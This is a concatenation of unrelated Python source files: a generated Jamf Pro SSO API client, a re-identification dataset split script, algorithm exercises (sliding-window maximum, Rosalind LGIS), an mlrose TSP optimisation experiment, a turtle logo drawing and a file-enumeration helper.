pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: SsoSettings """ kwargs['_return_http_data_only'] = True return self.v1_sso_get_with_http_info(**kwargs) # noqa: E501 def v1_sso_get_with_http_info(self, **kwargs): # noqa: E501 """Retrieve the current Single Sign On configuration settings # noqa: E501 Retrieves the current Single Sign On configuration settings # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_get_with_http_info(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(SsoSettings, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_get" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "SsoSettings", } return self.api_client.call_api( '/v1/sso', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_history_get(self, **kwargs): # noqa: E501 """Get SSO history object # noqa: E501 Gets SSO history object # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_history_get(async_req=True) >>> result = thread.get() :param page: :type page: int :param page_size: :type page_size: int :param sort: Sorting criteria in the format: property:asc/desc. Default sort is date:desc. Multiple sort criteria are supported and must be separated with a comma. Example: sort=date:desc,name:asc :type sort: list[str] :param filter: Query in the RSQL format, allowing to filter history notes collection. Default filter is empty query - returning all results for the requested page. Fields allowed in the query: username, date, note, details. This param can be combined with paging and sorting. Example: filter=username!=admin and details==*disabled* and date<2019-12-15 :type filter: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: HistorySearchResults """ kwargs['_return_http_data_only'] = True return self.v1_sso_history_get_with_http_info(**kwargs) # noqa: E501 def v1_sso_history_get_with_http_info(self, **kwargs): # noqa: E501 """Get SSO history object # noqa: E501 Gets SSO history object # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_history_get_with_http_info(async_req=True) >>> result = thread.get() :param page: :type page: int :param page_size: :type page_size: int :param sort: Sorting criteria in the format: property:asc/desc. Default sort is date:desc. Multiple sort criteria are supported and must be separated with a comma. Example: sort=date:desc,name:asc :type sort: list[str] :param filter: Query in the RSQL format, allowing to filter history notes collection. Default filter is empty query - returning all results for the requested page. Fields allowed in the query: username, date, note, details. This param can be combined with paging and sorting. Example: filter=username!=admin and details==*disabled* and date<2019-12-15 :type filter: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(HistorySearchResults, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'page', 'page_size', 'sort', 'filter' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_history_get" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501 query_params.append(('page', local_var_params['page'])) # noqa: E501 if 'page_size' in local_var_params and local_var_params['page_size'] is not None: # noqa: E501 query_params.append(('page-size', local_var_params['page_size'])) # noqa: E501 if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501 query_params.append(('sort', local_var_params['sort'])) # noqa: E501 collection_formats['sort'] = 'multi' # noqa: E501 if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501 query_params.append(('filter', local_var_params['filter'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "HistorySearchResults", } return self.api_client.call_api( '/v1/sso/history', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_history_post(self, object_history_note, **kwargs): # noqa: E501 """Add SSO history object notes # noqa: E501 Adds SSO history object notes # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_history_post(object_history_note, async_req=True) >>> result = thread.get() :param object_history_note: history notes to create (required) :type object_history_note: ObjectHistoryNote :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: HrefResponse """ kwargs['_return_http_data_only'] = True return self.v1_sso_history_post_with_http_info(object_history_note, **kwargs) # noqa: E501 def v1_sso_history_post_with_http_info(self, object_history_note, **kwargs): # noqa: E501 """Add SSO history object notes # noqa: E501 Adds SSO history object notes # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_history_post_with_http_info(object_history_note, async_req=True) >>> result = thread.get() :param object_history_note: history notes to create (required) :type object_history_note: ObjectHistoryNote :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(HrefResponse, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'object_history_note' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_history_post" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'object_history_note' is set if self.api_client.client_side_validation and ('object_history_note' not in local_var_params or # noqa: E501 local_var_params['object_history_note'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `object_history_note` when calling `v1_sso_history_post`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'object_history_note' in local_var_params: body_params = local_var_params['object_history_note'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 201: "HrefResponse", 503: "ApiError", } return self.api_client.call_api( '/v1/sso/history', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_metadata_download_get(self, **kwargs): # noqa: E501 """Download the Jamf Pro SAML metadata file # noqa: E501 Download the Jamf Pro SAML metadata file # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_metadata_download_get(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.v1_sso_metadata_download_get_with_http_info(**kwargs) # noqa: E501 def v1_sso_metadata_download_get_with_http_info(self, **kwargs): # noqa: E501 """Download the Jamf Pro SAML metadata file # noqa: E501 Download the Jamf Pro SAML metadata file # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_metadata_download_get_with_http_info(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_metadata_download_get" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['text/plain']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "file", } return self.api_client.call_api( '/v1/sso/metadata/download', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_put(self, sso_settings, **kwargs): # noqa: E501 """Updates the current Single Sign On configuration settings # noqa: E501 Updates the current Single Sign On configuration settings # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_put(sso_settings, async_req=True) >>> result = thread.get() :param sso_settings: (required) :type sso_settings: SsoSettings :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: SsoSettings """ kwargs['_return_http_data_only'] = True return self.v1_sso_put_with_http_info(sso_settings, **kwargs) # noqa: E501 def v1_sso_put_with_http_info(self, sso_settings, **kwargs): # noqa: E501 """Updates the current Single Sign On configuration settings # noqa: E501 Updates the current Single Sign On configuration settings # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_put_with_http_info(sso_settings, async_req=True) >>> result = thread.get() :param sso_settings: (required) :type sso_settings: SsoSettings :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(SsoSettings, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'sso_settings' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_put" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'sso_settings' is set if self.api_client.client_side_validation and ('sso_settings' not in local_var_params or # noqa: E501 local_var_params['sso_settings'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `sso_settings` when calling `v1_sso_put`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'sso_settings' in local_var_params: body_params = local_var_params['sso_settings'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "SsoSettings", 400: "ApiError", } return self.api_client.call_api( '/v1/sso', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_validate_post(self, sso_metadata_url, **kwargs): # noqa: E501 """Endpoint for validation of a saml metadata url # noqa: E501 Validation of a content available under provided metadata URL. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_validate_post(sso_metadata_url, async_req=True) >>> result = thread.get() :param sso_metadata_url: url to validate (required) :type sso_metadata_url: SsoMetadataUrl :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ kwargs['_return_http_data_only'] = True return self.v1_sso_validate_post_with_http_info(sso_metadata_url, **kwargs) # noqa: E501 def v1_sso_validate_post_with_http_info(self, sso_metadata_url, **kwargs): # noqa: E501 """Endpoint for validation of a saml metadata url # noqa: E501 Validation of a content available under provided metadata URL. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_validate_post_with_http_info(sso_metadata_url, async_req=True) >>> result = thread.get() :param sso_metadata_url: url to validate (required) :type sso_metadata_url: SsoMetadataUrl :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ local_var_params = locals() all_params = [ 'sso_metadata_url' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_validate_post" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'sso_metadata_url' is set if self.api_client.client_side_validation and ('sso_metadata_url' not in local_var_params or # noqa: E501 local_var_params['sso_metadata_url'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `sso_metadata_url` when calling `v1_sso_validate_post`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'sso_metadata_url' in local_var_params: body_params = local_var_params['sso_metadata_url'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = {} return self.api_client.call_api( '/v1/sso/validate', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) # -*- coding: utf-8 -*- import os from shutil import copyfile from tqdm import tqdm from fire import Fire # import _init_paths # from utils import utils # def copy_files(src, dst, extensions={'.jpg'}, recurse=False): # files = utils.get_files(src, extensions=extensions, recurse=recurse) # print(f'"{src}" --> {len(files)}.\n') # for file in tqdm(files): # ID = file.name.split('_')[0] # dst_path = os.path.join(dst, ID) # if not os.path.isdir(dst_path): os.makedirs(dst_path) # copyfile(file, os.path.join(dst_path, file.name)) def main(root): train_path = os.path.join(root, 'bounding_box_train') dst = os.path.join(root, 'prepare_data') os.makedirs(dst, exist_ok=True) train_save_path = os.path.join(dst, 'train') val_save_path = os.path.join(dst, 'val') if not os.path.isdir(train_save_path): os.mkdir(train_save_path) os.mkdir(val_save_path) for root, dirs, files in tqdm(os.walk(train_path, topdown=True)): for name in files: if not name[-3:]=='jpg': continue ID = name.split('_') src_path = os.path.join(train_path, name) dst_path = os.path.join(train_save_path, ID[0]) if not os.path.isdir(dst_path): os.mkdir(dst_path) dst_path = os.path.join(val_save_path, ID[0]) #first image is used as val image os.mkdir(dst_path) copyfile(src_path, os.path.join(dst_path, name)) if __name__ == '__main__': Fire(main) from .rasa_denerator import RasaDenerator __version__ = '1.0.4'deehzee/dsalgopractice/coderust/t0_arrays/p01_max_sliding_window.py """ Problem ======= Given a large array of integers and a window of size ww, find the current maximum value in the window as the window slides through the entire array. Example ------- a = [-4, 2, -5, 3, 6] k = 3 (window size) expected output: [2, 3, 6] """ from collections import deque import numpy as np # Time: O(n) # Space: O(k) def max_in_sliding_window(arr, width): acc = [] win = deque() for i, a in enumerate(arr): #insert while win and arr[win[-1]] <= a: win.pop() win.append(i) # max if i >= width - 1: acc.append(arr[win[0]]) # remove if win[0] <= i - width + 1: win.popleft() if len(arr) < width: acc.append(arr[win[0]]) return acc ## Testing ## def generate_random_input(maxlen=20, maxent=30): n = np.random.randint(0, maxlen) arr = np.random.randint(1, maxent + 1, n) return arr def check(acc, arr, width): ans = True for i in range(len(arr) - width + 1): if acc[i] != max(arr[i:i + width]): ans = False break return ans def random_tests(seed=None, maxlen=20, maxent=30): np.random.seed = seed n = 0 try: while True: flag = False arr = generate_random_input(maxlen, maxent) for width in range(1, len(arr) + 1): n += 1 acc = max_in_sliding_window(arr, width) if not check(acc, arr, width): print(f'Test #{n}') print('arr:', arr) print('width:', width) flag = True break if flag: break except KeyboardInterrupt: print(f'\nPassed {n} tests.') if __name__ == '__main__': print('Performing random tests...') print('Press ^C to stop.') random_tests(seed=42, maxlen=100, maxent=150) assignment2/tsp.py0 import mlrose import numpy as np import pandas as pd from sklearn.datasets import load_iris from sklearn.model_selection import train_test_split from sklearn.preprocessing import MinMaxScaler, OneHotEncoder from sklearn.metrics import accuracy_score from alg_runner import sim_annealing_runner, rhc_runner, ga_runner, mimic_runner from plotting import plot_montecarlo_sensitivity import pickle from datetime import datetime import logging logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) np.random.seed(1) problem_size = 25 if __name__ == "__main__": # # TODO Write state regeneration functions as lamdas # prob_size_int = int(problem_size) # weights = [int(np.random.randint(1, prob_size_int/2)) for _ in range(prob_size_int)] # values = [int(np.random.randint(1, prob_size_int/2)) for _ in range(prob_size_int)] # flip_fit = mlrose.TSP(weights, values) # flop_state_gen = lambda: np.random.randint(prob_size_int//4, prob_size_int//2, size=prob_size_int) # init_state = flop_state_gen() # problem = mlrose.DiscreteOpt(length=prob_size_int, fitness_fn=flip_fit, maximize=True, max_val=2) # all_results = {} # print("Running simulated annealing montecarlos") # sa_results, sa_timing = sim_annealing_runner(problem, init_state, state_regenerator=flop_state_gen) # plot_montecarlo_sensitivity('TSP', 'sim_anneal', sa_results) # plot_montecarlo_sensitivity('TSP', 'sim_anneal_timing', sa_timing) # all_results['SA'] = [sa_results, sa_timing] # print("Running random hill montecarlos") # rhc_results, rhc_timing = rhc_runner(problem, init_state, state_regenerator=flop_state_gen) # plot_montecarlo_sensitivity('TSP', 'rhc', rhc_results) # plot_montecarlo_sensitivity('TSP', 'rhc_timing', sa_timing) # all_results['RHC'] = [rhc_results, rhc_timing] # print("Running genetic algorithm montecarlos") # ga_results, ga_timing = ga_runner(problem, init_state, state_regenerator=flop_state_gen) # plot_montecarlo_sensitivity('TSP', 'ga', ga_results) # plot_montecarlo_sensitivity('TSP', 'ga_timing', ga_timing) # all_results['GA'] = [ga_results, ga_timing] # print("Running MIMIC montecarlos") # mimic_results, mimic_timing = mimic_runner(problem, init_state, state_regenerator=flop_state_gen) # plot_montecarlo_sensitivity('TSP', 'mimic', mimic_results) # plot_montecarlo_sensitivity('TSP', 'mimic_timing', mimic_timing) # all_results['MIMIC'] = [mimic_results, mimic_timing] # with open('./output/TSP/flipflip_data.pickle', 'wb') as handle: # pickle.dump(all_results, handle, protocol=pickle.HIGHEST_PROTOCOL) problem_size_space = np.linspace(5, 50, 2, dtype=int) best_fit_dict = {} best_fit_dict['Problem Size'] = problem_size_space best_fit_dict['Random Hill Climbing'] = [] best_fit_dict['Simulated Annealing'] = [] best_fit_dict['Genetic Algorithm'] = [] best_fit_dict['MIMIC'] = [] times = {} times['Problem Size'] = problem_size_space times['Random Hill Climbing'] = [] times['Simulated Annealing'] = [] times['Genetic Algorithm'] = [] times['MIMIC'] = [] fits_per_iteration = {} fits_per_iteration['Random Hill Climbing'] = [] fits_per_iteration['Simulated Annealing'] = [] fits_per_iteration['Genetic Algorithm'] = [] fits_per_iteration['MIMIC'] = [] for prob_size in problem_size_space: logger.info("---- Problem size: " + str(prob_size) + " ----") prob_size_int = int(prob_size) flip_fit = mlrose.TravellingSales.autogenerate(prob_size_int) tsp_state_gen = lambda: np.random.choice(prob_size_int, prob_size_int, replace=False) init_state = np.arange(prob_size_int) np.random.shuffle(init_state) problem = mlrose.TSPOpt(prob_size_int, maximize=False, coords=init_state) start = datetime.now() _, best_fitness_sa, fit_array_sa = mlrose.simulated_annealing(problem, schedule=mlrose.ExpDecay(exp_const=.0001, init_temp=5.), max_attempts=50, max_iters=3000, init_state=init_state, track_fits=True) best_fit_dict['Simulated Annealing'].append(best_fitness_sa) end = datetime.now() times['Simulated Annealing'].append((end-start).total_seconds()) start = datetime.now() _, best_fitness_rhc, fit_array_rhc = mlrose.random_hill_climb(problem, max_attempts=20, max_iters=3000, restarts=25, track_fits=True, init_state=init_state) best_fit_dict['Random Hill Climbing'].append(best_fitness_rhc) end = datetime.now() times['Random Hill Climbing'].append((end-start).total_seconds()) start = datetime.now() _, best_fitness_ga, fit_array_ga = mlrose.genetic_alg(problem, pop_size=prob_size_int*15, max_iters=10000, mutation_prob=.15, max_attempts=200, track_fits=True) best_fit_dict['Genetic Algorithm'].append(best_fitness_ga) end = datetime.now() times['Genetic Algorithm'].append((end-start).total_seconds()) start = datetime.now() _, best_fitness_mimic, fit_array_mimic = mlrose.mimic(problem, pop_size=prob_size_int*10, max_iters=10000, keep_pct=.1, max_attempts=100, track_fits=True) best_fit_dict['MIMIC'].append(best_fitness_mimic) end = datetime.now() times['MIMIC'].append((end-start).total_seconds()) # For the last fit that occurs, save off the fit arrays that are generated. We will plot fitness/iteration. fits_per_iteration['Random Hill Climbing'] = fit_array_rhc fits_per_iteration['Simulated Annealing'] = fit_array_sa fits_per_iteration['Genetic Algorithm'] = fit_array_ga fits_per_iteration['MIMIC'] = fit_array_mimic fit_frame = pd.DataFrame.from_dict(best_fit_dict, orient='index').transpose() # fit_frame.pop('Unnamed: 0') # idk why this shows up. time_frame = pd.DataFrame.from_dict(times, orient='index').transpose() # time_frame.pop('Unnamed: 0') # idk why this shows up. fit_iteration_frame = pd.DataFrame.from_dict(fits_per_iteration, orient='index').transpose() fit_frame.to_csv('./output/TSP/problem_size_fit.csv') time_frame.to_csv('./output/TSP/problem_size_time.csv') fit_iteration_frame.to_csv('./output/TSP/fit_per_iteration.csv')David-boo/RosalindRosalind_LGIS.py # Code on Python 3.7.4 # Working @ Dec, 2020 # david-boo.github.io # Messy code, working but improvable. TODO. data = open('./rosalind_LGIS.txt', 'r').read().splitlines() maxnum = int(data[0]) perm = [int(x) for x in data[1].split()] def lgis(maxnum, perm): levels = [] graph = {} for i in perm: if len(levels) == 0: levels.append([i]) graph[i] = 0 else: for lev in reversed(range(len(levels) + 1)): if i in graph.keys(): break if lev == 0: levels[0].append(i) graph[i] = 0 break lower_lev = levels[lev-1] lt = [x for x in lower_lev if x < i] if len(lt) > 0: if len(levels) == lev: levels.append([i]) else: levels[lev].append(i) lev_gt = [x for x in levels[lev] if x > i] levels[lev] = list(set(levels[lev]).difference(set(lev_gt))) graph[i] = lt[0] # Get now the returned answer table res = [] i = levels[-1][0] while(i != 0): res.append(i) i = graph[i] res = list(reversed(res)) return res print(" ".join([str(x) for x in lgis(maxnum, perm)])) print(" ".join( list(reversed([str(x) for x in lgis(maxnum, list(reversed(perm)))]))))import turtle def draw_circle(pen): # outer circle pen.setposition(0, -280) pen.pendown() pen.begin_fill() pen.color('red') pen.pencolor('white') pen.circle(300) pen.end_fill() pen.penup() def draw_circle2(pen): # inner circle pen.pensize(2) pen.setposition(0, -230) pen.pendown() pen.begin_fill() pen.color('black') pen.circle(250) pen.end_fill() pen.penup() def draw_A(pen): # drawing ‘A’ pen.setposition(30, -110) pen.pendown() pen.begin_fill() pen.color('red') pen.pensize(10) pen.pencolor('white') pen.forward(23) pen.backward(123) pen.left(60) pen.backward(220) pen.right(60) pen.backward(100) pen.right(117) pen.backward(710) pen.right(63) pen.backward(110) pen.right(90) pen.backward(510) pen.right(90) pen.backward(100) pen.right(90) pen.backward(70) pen.end_fill() pen.penup() def draw_triangle(pen): # Triangle shape in ‘A’ to make it look like 2d pen.pensize(10) pen.setposition(53, -40) pen.pendown() pen.begin_fill() pen.color('black') pen.pencolor('white') pen.right(90) pen.forward(100) pen.right(115) pen.forward(250) pen.right(157) pen.forward(227) pen.end_fill() def draw_arrow(pen): # arrow pen.backward(80) pen.left(42) pen.forward(147) pen.right(83) pen.forward(140) if __name__ == '__main__': win = turtle.Screen() win.bgcolor('black') avengers = turtle.Turtle() avengers.speed(10) avengers.pensize(10) avengers.penup() draw_circle(avengers) draw_circle2(avengers) draw_A(avengers) draw_triangle(avengers) draw_arrow(avengers) avengers.hideturtle() turtle.done()kevinw/amuletthird_party/angle-chrome_m34/tests/enumerate_files.py import fnmatch import os import sys rootdirs = [ ] filetypes = [ ] foundTypesArg = False for i in range(1, len(sys.argv)): arg = sys.argv[i] if arg == "-types": foundTypesArg = True continue if foundTypesArg: filetypes.append(arg) else: rootdirs.append(arg) for rootdir in rootdirs: for root, dirnames, filenames in os.walk(rootdir): for file in filenames: for type in filetypes: if fnmatch.fnmatchcase(file, type): print os.path.join(root, file).replace("\\", "/") break from __future__ import print_function import os 